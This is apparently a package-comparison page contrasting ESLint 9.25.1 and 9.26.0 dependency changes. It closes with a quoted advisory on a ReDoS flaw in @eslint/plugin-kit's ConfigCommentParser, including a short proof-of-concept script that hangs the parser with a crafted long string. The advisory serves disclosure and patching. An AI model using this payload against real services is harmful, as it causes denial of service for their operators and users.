ESLint 9.26.0 represents a minor update over version 9.25.1, offering incremental improvements and refinements to this popular JavaScript linting tool. Both versions share the core functionality of analyzing code for stylistic and potential error patterns, ensuring code quality and consistency. Key dependencies like espree, esquery, and esutils remain consistent, reflecting stability in the underlying parsing and analysis engines.
Developers upgrading to 9.26.0 will notice subtle enhancements rather than radical changes. The most significant difference lies in the @eslint/js dependency, which jumps from 9.25.1 to 9.26.0, indicating updated ECMAScript syntax support or rule adjustments. Additionally, @eslint/json moves from version 0.11.0 to 0.12.0, suggesting improvements or fixes related to JSON schema validation within ESLint configurations.
The development dependencies also reflect minor adjustments, though a notable change involves @types/node, staying at version 22.13.14. The number of files included in the packaged distribution has changed and the unpacked size has increased slightly, indicating addition of some assets or content.
These subtle updates collectively contribute to a more robust and efficient linting experience. While the core ESLint workflow remains familiar, developers benefit from enhanced rule accuracy, improved compatibility with newer JavaScript features, and refined configuration handling. These enhancements streamline code review processes and contribute to a codebase that adheres to the latest best practices. This version also has a more recent release date, which means that bug fixes and security issues are newer.
All the vulnerabilities related to the version 9.26.0 of the package
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.